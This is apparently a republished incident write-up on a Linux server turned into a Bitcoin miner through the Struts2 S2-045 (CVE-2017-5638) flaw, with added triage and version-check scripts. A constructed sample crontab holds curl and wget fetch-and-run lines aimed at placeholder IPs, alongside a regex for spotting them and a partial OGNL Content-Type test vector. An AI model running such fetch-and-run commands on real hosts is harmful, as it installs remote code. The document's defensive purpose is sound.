How a Struts2 RCE Vulnerability Turned My Linux Server into a Bitcoin Miner
A Linux server behind multiple firewalls was compromised by a Struts2 remote code execution flaw (CVE‑2017‑5638), leading to a hidden cron job that repeatedly launched a Bitcoin mining script, illustrating how outdated frameworks can expose systems to stealthy resource‑draining attacks.
Introduction
In 2011 a college student asked for investment advice and was told to buy Bitcoin and forget about the money; five years later that advice resurfaced as a popular answer on Zhihu.
Cause
The author describes a Linux server, protected by both an external and an internal firewall, that was nonetheless compromised. A process named atd (the name of the legitimate at scheduler daemon, which never behaves like this) was consuming nearly 600% CPU, i.e. about six cores. It was located with ps -eaf | grep atd and killed with kill -9 17257, but it reappeared a few minutes later: a clear sign that something was respawning it, so killing the process on its own was never going to fix anything.
Checking the scheduled tasks with crontab -l revealed unknown entries that fetched a script from a malicious URL. (crontab -l shows only the calling user's crontab; /etc/crontab, /etc/cron.d and the other users' spool files need to be checked as well.) The response from that URL was a shell script containing an rm -rf command, together with evidence that a Struts2 exploit had been used to download and launch a Bitcoin mining payload.
Further analysis tied the code to the Struts2 OGNL injection S2-045 (CVE-2017-5638): the exploit was being used to write crontab entries and start the miner on vulnerable Linux servers.
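The steps above (find the hot process, find out what it really is, enumerate every place cron could be respawning it, and flag the fetch-and-run entries) as an added triage script. This is example code written for this page, not the author's commands; it assumes a Linux host with /proc and procps ps, run as root, and all helper names are hypothetical. The sample crontab embedded at the bottom is constructed for the demo and is not the attacker's real entry.

```shell
#!/bin/sh
# Triage helpers for a cron-persisted miner (added example, not the article's own commands).
# Assumes Linux with /proc and procps ps; run as root. Helper names are hypothetical.

# Top CPU consumers with age and full command line. %CPU over 100 means more than one core:
# the "600%" in the write-up is a six-core burn, which no genuine atd ever shows.
top_cpu_procs() {
    ps -eo pid,ppid,pcpu,etime,comm,args --sort=-pcpu | head -n "$((${1:-5} + 1))"
}

# What a PID really is: the binary behind its name, its cwd and its parent. An exe path ending
# in "(deleted)" means the binary was removed after launch, a common miner trick.
pid_identity() {
    pid=$1
    [ -d "/proc/$pid" ] || { echo "no such pid: $pid" >&2; return 1; }
    printf 'exe:  %s\n' "$(readlink "/proc/$pid/exe" 2>/dev/null || echo '?')"
    printf 'cwd:  %s\n' "$(readlink "/proc/$pid/cwd" 2>/dev/null || echo '?')"
    printf 'ppid: %s\n' "$(awk '/^PPid:/ {print $2}' "/proc/$pid/status")"
    printf 'cmd:  %s\n' "$(tr '\000' ' ' < "/proc/$pid/cmdline")"
}

# Every cron persistence location, each line prefixed with where it came from. crontab -l alone
# shows only the calling user's spool; an attacker may pick any user or any system directory.
dump_all_crontabs() {
    for u in $(cut -d: -f1 /etc/passwd); do
        crontab -l -u "$u" 2>/dev/null | sed "s/^/[$u] /"
    done
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/*; do
        [ -f "$f" ] && sed "s|^|[$f] |" "$f"
    done
    return 0
}

# Filter crontab lines on stdin down to the ones that download something and pipe it into a
# shell, which is the shape of the entry found in the write-up. Comment lines (with or without
# the "[user] " prefix added by dump_all_crontabs) are ignored.
flag_download_exec_lines() {
    grep -Ev '^(\[[^]]*\] )?[[:space:]]*#' \
      | grep -E '(curl|wget)[^|]*[|][[:space:]]*(/bin/|/usr/bin/)?(ba)?sh([[:space:]]|$)' \
      | sed 's/^/SUSPECT: /'
}

# Constructed sample crontab (not the attacker's real one): two fetch-and-run entries among
# normal jobs, plus a commented-out one that must not be flagged.
SAMPLE_CRONTAB='0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * curl -fsSL http://192.0.2.10/pm.sh | sh
# 0 4 * * * wget -q -O- http://example.invalid/old.sh | sh
* * * * * wget -q -O- http://198.51.100.7/i.sh | bash >/dev/null 2>&1
*/10 * * * * /usr/bin/certbot renew --quiet'

demo_flag_sample() { printf '%s\n' "$SAMPLE_CRONTAB" | flag_download_exec_lines; }

case "${1:-}" in
    top)  top_cpu_procs "${2:-5}" ;;
    pid)  pid_identity "$2" ;;
    cron) dump_all_crontabs | flag_download_exec_lines ;;
    demo) demo_flag_sample ;;
esac
```

Run `sh triage.sh top`, then `sh triage.sh pid <pid>` on the hot process, then `sh triage.sh cron` to get the respawn entries; remove those entries first and only then kill the process, otherwise the next cron tick brings it back.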
Mining Organization
Struts2 remote code execution vulnerabilities have been disclosed since 2010 (S2-005, S2-009, S2-013, S2-016, S2-019, S2-020, S2-032, S2-037, the devMode issue, and in 2017 S2-045), and each disclosure was followed by mass scanning. This attack used S2-045, an OGNL injection in the Jakarta multipart parser: when a request carries a crafted Content-Type header, the header value ends up in an error message that Struts evaluates as an OGNL expression, so the attacker's commands run with the privileges of the servlet container. No file actually has to be uploaded; here the injected command fetched the script that installed the Bitcoin miner.
Analysis of network traffic showed IP addresses associated with an organized mining group targeting vulnerable Struts2 installations.
Solution
Upgrade to Struts 2.3.32 or 2.5.10.1 (the releases that fix S2-045) or later; note that 2.5.10 itself is still vulnerable. If an upgrade is not immediately possible, the advisory's workarounds are to switch to a different multipart parser (for example the Pell multipart plugin) or to put a servlet filter in front of the application that rejects any request whose Content-Type is not a well-formed multipart/form-data value. Run the servlet container as an unprivileged user so a successful injection cannot reach the rest of the system, and when cleaning up remove the crontab entries before killing the miner, otherwise it simply comes back. A miner is the best case for this kind of compromise: it burns CPU rather than destroying data, but the same remote code execution could have delivered anything, so a host on which it appeared should be treated as fully compromised and rebuilt.
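Two checks a practitioner wants after reading the S2-045 description and the fix versions above: which struts2-core jars on a host fall into the affected range, and a Content-Type gate of the kind the advisory's servlet-filter workaround applies. This is an added example written for this page, not the project's or the author's code; it assumes jars are deployed under their original struts2-core-<version>.jar names, all helper names are hypothetical, and the header values at the bottom are constructed test vectors, not captured traffic.

```shell
#!/bin/sh
# S2-045 exposure checks (added example, not from the article). Helper names are hypothetical.
# Fix releases per the Apache advisory: 2.3.32 and 2.5.10.1; affected: 2.3.5-2.3.31 and 2.5-2.5.10.

# Compare dotted numeric versions: prints 0 if $1 < $2, 1 if equal, 2 if $1 > $2.
# Missing trailing components count as 0, so 2.5.10 < 2.5.10.1.
vcmp() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        na = split(a, x, "."); nb = split(b, y, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            xi = (i <= na) ? x[i] + 0 : 0
            yi = (i <= nb) ? y[i] + 0 : 0
            if (xi < yi) { print 0; exit }
            if (xi > yi) { print 2; exit }
        }
        print 1
    }'
}
version_lt() { [ "$(vcmp "$1" "$2")" -eq 0 ]; }

# Classify one struts2-core version string against the S2-045 ranges.
s2045_status() {
    case "$1" in
        2.3.*)
            if version_lt "$1" 2.3.5;    then echo outside-affected-range
            elif version_lt "$1" 2.3.32; then echo vulnerable
            else echo patched; fi ;;
        2.5|2.5.*)
            if version_lt "$1" 2.5.10.1; then echo vulnerable; else echo patched; fi ;;
        *)  echo outside-affected-range ;;   # end-of-life or unknown line: upgrade anyway
    esac
}

# Walk a deployment root (e.g. Tomcat's webapps) and classify every struts2-core jar by file
# name. Output: status<TAB>version<TAB>path. Renamed or shaded jars are missed; check manifests.
scan_struts_jars() {
    find "$1" -type f -name 'struts2-core-*.jar' 2>/dev/null | while read -r jar; do
        ver=$(basename "$jar" .jar | sed 's/^struts2-core-//')
        printf '%s\t%s\t%s\n' "$(s2045_status "$ver")" "$ver" "$jar"
    done
}

# Gate a Content-Type value the way the advisory's filter workaround does: any value carrying
# OGNL markers ("%{", "${", "#": none of these is legal in a multipart boundary), or one that
# claims multipart but is not a well-formed multipart/form-data value, is rejected.
# Returns 0 (accept) or 1 (reject).
content_type_ok() {
    ct=$1
    case "$ct" in
        *'%{'*|*'${'*|*'#'*) return 1 ;;
    esac
    case "$ct" in
        multipart/*)
            printf '%s' "$ct" | grep -Eq '^multipart/form-data([[:space:]]*;[[:space:]]*[A-Za-z0-9_-]+=[^;[:cntrl:]]*)*$' ;;
        *) return 0 ;;
    esac
}

# Constructed test vectors (not captured traffic); the third carries the "%{" OGNL marker.
CT_BENIGN_MULTIPART='multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW'
CT_BENIGN_JSON='application/json'
CT_OGNL_MARKER="%{#_='multipart/form-data'}"
CT_MALFORMED='multipart/form-data; boundary'

case "${1:-}" in
    scan)  scan_struts_jars "${2:-.}" ;;
    check) if content_type_ok "${2:-}"; then echo accept; else echo reject; fi ;;
esac
```

`sh s2045.sh scan /opt/tomcat/webapps` lists every jar with its status; `sh s2045.sh check "$ct"` is the same decision a front-end filter would make. The version check is only as good as the jar names, so on a host that was already exploited treat a clean result as a hint, not proof.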
Author: 小柒 Source: http://www.cnblogs.com/smallSevens/p/7554380.html
This article has been distilled and summarized from the source material and republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
